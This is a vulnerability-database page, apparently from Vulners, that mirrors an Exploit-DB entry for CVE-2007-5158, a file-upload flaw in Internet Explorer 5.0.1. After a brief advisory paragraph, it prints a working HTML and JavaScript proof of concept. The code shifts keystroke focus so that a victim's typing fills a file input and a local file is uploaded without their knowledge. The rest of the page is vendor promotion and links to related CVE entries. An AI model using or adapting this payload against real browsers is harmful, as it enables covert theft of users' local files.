Lucene search
+L

Microsoft Internet Explorer 5.0.1 - Arbitrary File Upload

🗓️ 27 Sep 2007 00:00:00Reported by Ronald van den HeetkampType 
exploitdb
 exploitdb
🔗 www.exploit-db.com👁 30 Views

Microsoft Internet Explorer 5.0.1 - Vulnerability in File Uploa

Related
Code
ReporterTitlePublishedViews
Family
CVE
CVE-2007-5158
1 Oct 200700:00
cve
Cvelist
CVE-2007-5158
1 Oct 200700:00
cvelist
NVD
CVE-2007-5158
1 Oct 200705:17
nvd
Prion
Design/Logic Flaw
1 Oct 200705:17
prion
source: https://www.securityfocus.com/bid/25836/info

Microsoft Internet Explorer is prone to an information-disclosure vulnerability that allows attackers to gain access to the contents of arbitrary files.

This issue stems from a design error resulting from the improper handling of form fields.

This issue is similar to the one described in BID 24725 (Mozilla Firefox OnKeyDown Event File Upload Vulnerability).

# based upon Hong's exploit:
# http://sla.ckers.org/forum/read.php?3,13142

<script>

function Clear() {
     document.getElementById("label1").htmlFor="file1";
     document.getElementById("text1").focus();
}

function Down() {
     document.getElementById("file1").focus();
}

</script>

<input type="file" id="file1" name="file1" onkeydown="Clear()" onkeyup="Clear()" />
<label id="label1" name="label1"></label>
<br />
<textarea name="text1" id="text1" onkeydown="Down()">
&lt;/textarea&gt;

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation